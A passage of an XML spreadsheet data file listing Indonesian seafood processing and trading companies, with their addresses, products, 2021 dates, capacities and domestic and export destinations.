    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="24968"/>
    <x v="1107"/>
    <s v="PT. SOEJASCH BALI"/>
    <s v="Jl. Gunung Patas No.1, Kel. Padang Sambian Kelod, Kec. Denpasar Barat, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Salmon Asap"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="12000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="24969"/>
    <x v="1107"/>
    <s v="PT. SOEJASCH BALI"/>
    <s v="Jl. Gunung Patas No.1, Kel. Padang Sambian Kelod, Kec. Denpasar Barat, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Herring Acar Gulung"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="12000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung, Kota Semarang, Kota Surabaya, Kota Denpasar, Kota Palangka Raya, Kota Balikpapan, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="24970"/>
    <x v="1108"/>
    <s v="CV. MITRA SEJAHTERA"/>
    <s v="Jl. Ir. Sutami No.38 Blok H2-10, Kel. Parang Loe, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Rumput Laut Kering"/>
    <d v="2021-05-10T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Spain"/>
  </r>
  <r>
    <n v="24971"/>
    <x v="621"/>
    <s v="CV. NAPIT NAULI"/>
    <s v="Pelabuhan Tengkayu II, Kel. SDF Pelabuhan, Kec. Tarakan Tengah, Kota Tarakan&lt;br&gt;Kalimantan Utara"/>
    <n v="24"/>
    <s v="Bandeng Tanpa Duri"/>
    <d v="2021-05-28T00:00:00"/>
    <n v="64800"/>
    <s v="Kabupaten Nunukan"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="24972"/>
    <x v="246"/>
    <s v="PT. SIGER JAYA SENTOSA"/>
    <s v="Jl. Raya Tanjung Bintang No.101, Kel. Serdang, Kec. Tanjung Bintang, Kabupaten Lampung Selatan&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Udang Kipas Beku"/>
    <d v="2021-04-26T00:00:00"/>
    <n v="6000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="24978"/>
    <x v="1109"/>
    <s v="CV. SOON HO"/>
    <s v="Komplek Pelabuhan Perikanan Samudera Belawan, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Beku (Bonito, Tongkol, Marlin, Aso-aso, Cakalang, Kuring, Bulan)"/>
    <d v="2021-04-14T00:00:00"/>
    <n v="400000"/>
    <s v="Kota Banda Aceh, Kabupaten Tapanuli Selatan, Kabupaten Tapanuli Tengah, Kabupaten Tapanuli Utara, Kabupaten Toba Samosir, Kabupaten Labuhan Batu, Kabupaten Deli Serdang, Kota Pematang Siantar, Kota Tebing Tinggi, Kota Medan, Kota Binjai, Kota Dumai"/>
    <s v="Hong Kong, Malaysia, Oman, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="24979"/>
    <x v="1109"/>
    <s v="CV. SOON HO"/>
    <s v="Komplek Pelabuhan Perikanan Samudera Belawan, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-04-14T00:00:00"/>
    <n v="600000"/>
    <s v="Kota Banda Aceh"/>
    <s v="Australia, China, Japan, Korea, Democratic People's Republic of, Malaysia, Taiwan, Province of China, Thailand, United Arab Emirates, Viet Nam"/>
  </r>
  <r>
    <n v="24980"/>
    <x v="1109"/>
    <s v="CV. SOON HO"/>
    <s v="Komplek Pelabuhan Perikanan Samudera Belawan, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Demersal Beku (Mata Goyang, Malong, Gulama, Emperor, Kerapu, Bawal, Terisi)"/>
    <d v="2021-04-14T00:00:00"/>
    <n v="600000"/>
    <s v="Kota Medan"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand, United Arab Emirates, Viet Nam"/>
  </r>
  <r>
    <n v="24981"/>
    <x v="1109"/>
    <s v="CV. SOON HO"/>
    <s v="Komplek Pelabuhan Perikanan Samudera Belawan, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Demersal Segar (Kambing-kambing, Layur, Senangin, Kerapu, Bawal, Kakap)"/>
    <d v="2021-04-14T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Medan"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="24982"/>
    <x v="1109"/>
    <s v="CV. SOON HO"/>
    <s v="Komplek Pelabuhan Perikanan Samudera Belawan, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-04-14T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="24983"/>
    <x v="1109"/>
    <s v="CV. SOON HO"/>
    <s v="Komplek Pelabuhan Perikanan Samudera Belawan, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kerang Segar"/>
    <d v="2021-04-14T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="Malaysia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="24984"/>
    <x v="397"/>
    <s v="PT. HAE DONG JAYA ABADI"/>
    <s v="Jl. Margomulyo Permai Blok H5, Kel. Tambak Sarioso, Kec. Asemrowo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Beku"/>
    <d v="2021-04-30T00:00:00"/>
    <n v="800000"/>
    <s v="Kabupaten Lamongan, Kabupaten Bangkalan, Kota Pasuruan, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="24985"/>
    <x v="397"/>
    <s v="PT. HAE DONG JAYA ABADI"/>
    <s v="Jl. Margomulyo Permai Blok H5, Kel. Tambak Sarioso, Kec. Asemrowo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Deho, Kembung, Layang, Cakalang, Tenggiri)"/>
    <d v="2021-04-30T00:00:00"/>
    <n v="800000"/>
    <s v="Kabupaten Lamongan, Kabupaten Bangkalan, Kota Pasuruan, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="24986"/>
    <x v="1110"/>
    <s v="PT. GRAHAMAKMUR CIPTAPRATAMA"/>
    <s v="Jl. Poros Toronipa, Kel. Tapulaga, Kec. Soropia, Kabupaten Konawe&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Udang Beku"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="24988"/>
    <x v="1110"/>
    <s v="PT. GRAHAMAKMUR CIPTAPRATAMA"/>
    <s v="Jl. Poros Toronipa, Kel. Tapulaga, Kec. Soropia, Kabupaten Konawe&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Ikan Pelagis Beku (Tongkol, Layang, Cakalang)"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="24989"/>
    <x v="1110"/>
    <s v="PT. GRAHAMAKMUR CIPTAPRATAMA"/>
    <s v="Jl. Poros Toronipa, Kel. Tapulaga, Kec. Soropia, Kabupaten Konawe&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Tuna Beku"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="24990"/>
    <x v="1110"/>
    <s v="PT. GRAHAMAKMUR CIPTAPRATAMA"/>
    <s v="Jl. Poros Toronipa, Kel. Tapulaga, Kec. Soropia, Kabupaten Konawe&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Cephalopoda Beku (Gurita)"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="24991"/>
    <x v="1110"/>
    <s v="PT. GRAHAMAKMUR CIPTAPRATAMA"/>
    <s v="Jl. Poros Toronipa, Kel. Tapulaga, Kec. Soropia, Kabupaten Konawe&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Ikan Demersal Beku (Kakap Putih, Kakap Merah)"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="300000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="24992"/>
    <x v="1111"/>
    <s v="PT, KENCANA LAUT NUSANTARA"/>
    <s v="Dermaga Muara Angke No,6 RT 001 RW 011, Kel, Pluit, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="800000"/>
    <s v="Kabupaten Bangka, Kabupaten Belitung, Kota Pangkal Pinang, Kota Batam"/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24993"/>
    <x v="1111"/>
    <s v="PT, KENCANA LAUT NUSANTARA"/>
    <s v="Dermaga Muara Angke No,6 RT 001 RW 011, Kel, Pluit, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Makerel Atlantik, Lemuru, Tongkol, Capelin, Kembung, Lemadang)"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="180000"/>
    <s v="Kabupaten Bangka, Kabupaten Belitung, Kota Batam"/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24994"/>
    <x v="1111"/>
    <s v="PT, KENCANA LAUT NUSANTARA"/>
    <s v="Dermaga Muara Angke No,6 RT 001 RW 011, Kel, Pluit, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Kakap Putih, Bawal, Malong, Gulama, Lencam, Manyung)"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="50000"/>
    <s v="Kabupaten Bangka, Kabupaten Belitung, Kota Batam"/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24995"/>
    <x v="1111"/>
    <s v="PT, KENCANA LAUT NUSANTARA"/>
    <s v="Dermaga Muara Angke No,6 RT 001 RW 011, Kel, Pluit, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Pari Beku"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="20000"/>
    <s v="Kabupaten Bangka, Kabupaten Belitung, Kota Batam"/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24996"/>
    <x v="1111"/>
    <s v="PT, KENCANA LAUT NUSANTARA"/>
    <s v="Dermaga Muara Angke No,6 RT 001 RW 011, Kel, Pluit, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Kipas Beku"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="20000"/>
    <s v="Kabupaten Bangka, Kabupaten Belitung, Kota Batam"/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24997"/>
    <x v="1111"/>
    <s v="PT, KENCANA LAUT NUSANTARA"/>
    <s v="Dermaga Muara Angke No,6 RT 001 RW 011, Kel, Pluit, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Beku"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="50000"/>
    <s v="Kabupaten Bangka, Kabupaten Belitung, Kota Batam"/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24998"/>
    <x v="1111"/>
    <s v="PT. KENCANA LAUT NUSANTARA"/>
    <s v="Dermaga Muara Angke No.6 RT 001 RW 011, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Beku"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Bangka, Kabupaten Belitung, Kota Batam"/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24999"/>
    <x v="1111"/>
    <s v="PT. KENCANA LAUT NUSANTARA"/>
    <s v="Dermaga Muara Angke No.6 RT 001 RW 011, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Daging Kepiting Beku"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Bangka, Kabupaten Belitung, Kota Batam"/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25000"/>
    <x v="1111"/>
    <s v="PT, KENCANA LAUT NUSANTARA"/>
    <s v="Dermaga Muara Angke No,6 RT 001 RW 011, Kel, Pluit, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Beku"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="500000"/>
    <s v="Kabupaten Bangka, Kabupaten Belitung, Kota Batam"/>
    <s v="Indonesia"/>
  </r>
  <r>
    <n v="25001"/>
    <x v="1112"/>
    <s v="PT. DELTA PASIFIC INDOTUNA"/>
    <s v="Jl. Veteran, Kel. Girian Bawah Lingkungan IV, Kec. Girian, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Pouch"/>
    <d v="2021-05-27T00:00:00"/>
    <n v="900000"/>
    <s v="Kota Medan, Kota Jakarta Pusat, Kota Surabaya"/>
    <s v="Saudi Arabia"/>
  </r>
  <r>
    <n v="25002"/>
    <x v="1113"/>
    <s v="UD. SEJAHTERA 1"/>
    <s v="Desa Wai Muli Timur RT 002 RW 001, Kec. Rajabasa, Kabupaten Lampung Selatan&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Ikan Asin Kering"/>
    <d v="2021-04-12T00:00:00"/>
    <n v="400"/>
    <s v="Kabupaten Lampung Selatan"/>
    <m/>
  </r>
  <r>
    <n v="25003"/>
    <x v="1113"/>
    <s v="UD. SEJAHTERA 1"/>
    <s v="Desa Wai Muli Timur RT 002 RW 001, Kec. Rajabasa, Kabupaten Lampung Selatan&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso Ikan)"/>
    <d v="2021-04-12T00:00:00"/>
    <n v="1200"/>
    <s v="Kabupaten Lampung Selatan, Kota Bandar Lampung, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="25004"/>
    <x v="1114"/>
    <s v="PT. INTRASINDO"/>
    <s v="Harapan Baru Regency C-1/9 RT 003 RW 014, Kel. Kota Baru, Kec. Bekasi Barat, Kota Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Tepung Karaginan"/>
    <d v="2021-05-25T00:00:00"/>
    <n v="100000"/>
    <s v="Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="25008"/>
    <x v="1115"/>
    <s v="PT. HASIL LAUT SIBOLGA"/>
    <s v="Jl. Gatot Subroto No.71, Kel. Pondok Batu, Kec. Sarudik, Kabupaten Tapanuli Tengah&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Beku (Tongkol, Cakalang)"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="250000"/>
    <s v="Kota Sibolga"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25009"/>
    <x v="1115"/>
    <s v="PT. HASIL LAUT SIBOLGA"/>
    <s v="Jl. Gatot Subroto No.71, Kel. Pondok Batu, Kec. Sarudik, Kabupaten Tapanuli Tengah&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Demersal Beku (Kambing-kambing, Layur)"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="2500000"/>
    <s v="Kota Sibolga"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25010"/>
    <x v="1115"/>
    <s v="PT. HASIL LAUT SIBOLGA"/>
    <s v="Jl. Gatot Subroto No.71, Kel. Pondok Batu, Kec. Sarudik, Kabupaten Tapanuli Tengah&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Beku (Sotong, Gurita)"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="1500000"/>
    <s v="Kota Sibolga"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25011"/>
    <x v="1115"/>
    <s v="PT. HASIL LAUT SIBOLGA"/>
    <s v="Jl. Gatot Subroto No.71, Kel. Pondok Batu, Kec. Sarudik, Kabupaten Tapanuli Tengah&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Tuna Beku"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="2500000"/>
    <s v="Kota Sibolga"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25012"/>
    <x v="1116"/>
    <s v="PT. DUA PUTRA PERKASA PRATAMA"/>
    <s v="Jl. Mawar Raya No.9 Perumahan Pura Melati Indah (Gudang 1), Kel. Jati Rahayu, Kec. Pondok Melati, Kota Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tongkol, Kembung, Layang, Cakalang, Tenggiri, Salem)"/>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13"/>
    <x v="1116"/>
    <s v="PT. DUA PUTRA PERKASA PRATAMA"/>
    <s v="Jl. Mawar Raya No.9 Perumahan Pura Melati Indah (Gudang 1), Kel. Jati Rahayu, Kec. Pondok Melati, Kota Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Pelagis Segar (Lemuru, Tongkol, Kembung, Layang, Cakalang, Tenggiri, Salem)"/>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14"/>
    <x v="1116"/>
    <s v="PT. DUA PUTRA PERKASA PRATAMA"/>
    <s v="Jl. Mawar Raya No.9 Perumahan Pura Melati Indah (Gudang 1), Kel. Jati Rahayu, Kec. Pondok Melati, Kota Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Demersal Beku (Barramundi, Kerapu, Kakap, Kurisi)"/>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15"/>
    <x v="1116"/>
    <s v="PT. DUA PUTRA PERKASA PRATAMA"/>
    <s v="Jl. Mawar Raya No.9 Perumahan Pura Melati Indah (Gudang 1), Kel. Jati Rahayu, Kec. Pondok Melati, Kota Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Demersal Segar (Barramundi, Kerapu, Kakap, Kurisi)"/>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16"/>
    <x v="1116"/>
    <s v="PT. DUA PUTRA PERKASA PRATAMA"/>
    <s v="Jl. Mawar Raya No.9 Perumahan Pura Melati Indah (Gudang 1), Kel. Jati Rahayu, Kec. Pondok Melati, Kota Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Cephalopoda Beku (Sotong, Cumi-cumi)"/>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17"/>
    <x v="1116"/>
    <s v="PT. DUA PUTRA PERKASA PRATAMA"/>
    <s v="Jl. Mawar Raya No.9 Perumahan Pura Melati Indah (Gudang 1), Kel. Jati Rahayu, Kec. Pondok Melati, Kota Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Cephalopoda Segar (Sotong, Cumi-cumi)"/>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18"/>
    <x v="1116"/>
    <s v="PT. DUA PUTRA PERKASA PRATAMA"/>
    <s v="Jl. Mawar Raya No.9 Perumahan Pura Melati Indah (Gudang 1), Kel. Jati Rahayu, Kec. Pondok Melati, Kota Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Tuna Beku"/>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19"/>
    <x v="1116"/>
    <s v="PT. DUA PUTRA PERKASA PRATAMA"/>
    <s v="Jl. Mawar Raya No.9 Perumahan Pura Melati Indah (Gudang 1), Kel. Jati Rahayu, Kec. Pondok Melati, Kota Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Tuna Segar"/>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20"/>
    <x v="1116"/>
    <s v="PT. DUA PUTRA PERKASA PRATAMA"/>
    <s v="Jl. Mawar Raya No.9 Perumahan Pura Melati Indah (Gudang 1), Kel. Jati Rahayu, Kec. Pondok Melati, Kota Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Udang Beku"/>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21"/>
    <x v="1116"/>
    <s v="PT. DUA PUTRA PERKASA PRATAMA"/>
    <s v="Jl. Mawar Raya No.9 Perumahan Pura Melati Indah (Gudang 1), Kel. Jati Rahayu, Kec. Pondok Melati, Kota Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Udang Segar"/>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22"/>
    <x v="1116"/>
    <s v="PT. DUA PUTRA PERKASA PRATAMA"/>
    <s v="Jl. Mawar Raya No.9 Perumahan Pura Melati Indah (Gudang 1), Kel. Jati Rahayu, Kec. Pondok Melati, Kota Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Salmon Beku"/>
    <d v="2021-05-31T00:00:00"/>
    <n v="100"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bandung, Kabupaten Bekasi, Kabupaten Bandung Barat, Kota Bandung, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="25023"/>
    <x v="1116"/>
    <s v="PT. DUA PUTRA PERKASA PRATAMA"/>
    <s v="Jl. Mawar Raya No.9 Perumahan Pura Melati Indah (Gudang 1), Kel. Jati Rahayu, Kec. Pondok Melati, Kota Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Salmon Segar"/>
    <d v="2021-05-31T00:00:00"/>
    <n v="1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1"/>
    <x v="1117"/>
    <s v="PT. PESONA SARI BINTANG"/>
    <s v="Jl. Mawar Raya No.9 Perumahan Pura Melati Indah (Gudang 2), Kel. Jati Rahayu, Kec. Pondok Melati, Kota Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tongkol, Kembung, Layang, Cakalang, Tenggiri, Salem)"/>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2"/>
    <x v="1117"/>
    <s v="PT. PESONA SARI BINTANG"/>
    <s v="Jl. Mawar Raya No.9 Perumahan Pura Melati Indah (Gudang 2), Kel. Jati Rahayu, Kec. Pondok Melati, Kota Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Pelagis Segar (Lemuru, Tongkol, Kembung, Layang, Cakalang, Salem)"/>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3"/>
    <x v="1117"/>
    <s v="PT. PESONA SARI BINTANG"/>
    <s v="Jl. Mawar Raya No.9 Perumahan Pura Melati Indah (Gudang 2), Kel. Jati Rahayu, Kec. Pondok Melati, Kota Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Demersal Beku (Barramundi, Kerapu, Kakap)"/>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4"/>
    <x v="1117"/>
    <s v="PT. PESONA SARI BINTANG"/>
    <s v="Jl. Mawar Raya No.9 Perumahan Pura Melati Indah (Gudang 2), Kel. Jati Rahayu, Kec. Pondok Melati, Kota Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Demersal Segar (Barramundi, Kerapu, Kakap)"/>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5"/>
    <x v="1117"/>
    <s v="PT. PESONA SARI BINTANG"/>
    <s v="Jl. Mawar Raya No.9 Perumahan Pura Melati Indah (Gudang 2), Kel. Jati Rahayu, Kec. Pondok Melati, Kota Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>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6"/>
    <x v="1117"/>
    <s v="PT. PESONA SARI BINTANG"/>
    <s v="Jl. Mawar Raya No.9 Perumahan Pura Melati Indah (Gudang 2), Kel. Jati Rahayu, Kec. Pondok Melati, Kota Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Cephalopoda Segar (Cumi-cumi)"/>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7"/>
    <x v="1117"/>
    <s v="PT. PESONA SARI BINTANG"/>
    <s v="Jl. Mawar Raya No.9 Perumahan Pura Melati Indah (Gudang 2), Kel. Jati Rahayu, Kec. Pondok Melati, Kota Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Tuna Beku"/>
    <d v="2021-05-31T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="25048"/>
    <x v="1117"/>
    <s v="PT. PESONA SARI BINTANG"/>
    <s v="Jl. Mawar Raya No.9 Perumahan Pura Melati Indah (Gudang 2), Kel. Jati Rahayu, Kec. Pondok Melati, Kota Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Tuna Segar"/>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49"/>
    <x v="1117"/>
    <s v="PT. PESONA SARI BINTANG"/>
    <s v="Jl. Mawar Raya No.9 Perumahan Pura Melati Indah (Gudang 2), Kel. Jati Rahayu, Kec. Pondok Melati, Kota Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Udang Segar"/>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50"/>
    <x v="1117"/>
    <s v="PT. PESONA SARI BINTANG"/>
    <s v="Jl. Mawar Raya No.9 Perumahan Pura Melati Indah (Gudang 2), Kel. Jati Rahayu, Kec. Pondok Melati, Kota Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Udang Beku"/>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51"/>
    <x v="1117"/>
    <s v="PT. PESONA SARI BINTANG"/>
    <s v="Jl. Mawar Raya No.9 Perumahan Pura Melati Indah (Gudang 2), Kel. Jati Rahayu, Kec. Pondok Melati, Kota Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Salmon Beku"/>
    <d v="2021-05-31T00:00:00"/>
    <n v="1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52"/>
    <x v="1117"/>
    <s v="PT. PESONA SARI BINTANG"/>
    <s v="Jl. Mawar Raya No.9 Perumahan Pura Melati Indah (Gudang 2), Kel. Jati Rahayu, Kec. Pondok Melati, Kota Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Salmon Segar"/>
    <d v="2021-05-31T00:00:00"/>
    <n v="1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53"/>
    <x v="1118"/>
    <s v="PT. SUMBERJAYA BUMI LESTARI"/>
    <s v="Jl. Peternakan 2 No.28, Kel. Kapuk, Kec. Cengkareng, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Asin Kering"/>
    <d v="2021-04-26T00:00:00"/>
    <n v="1500000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Sumedang, Kabupaten Karawang, Kabupaten Serang"/>
    <m/>
  </r>
  <r>
    <n v="25054"/>
    <x v="1119"/>
    <s v="PT. BUAH MIMPI"/>
    <s v="Jl. Kima 17 Kav. DD - 9A, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Cephalopoda Beku (Gurita)"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="90000"/>
    <s v="Kota Medan, Kota Bogor, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="25055"/>
    <x v="1120"/>
    <s v="CV. MAHERA"/>
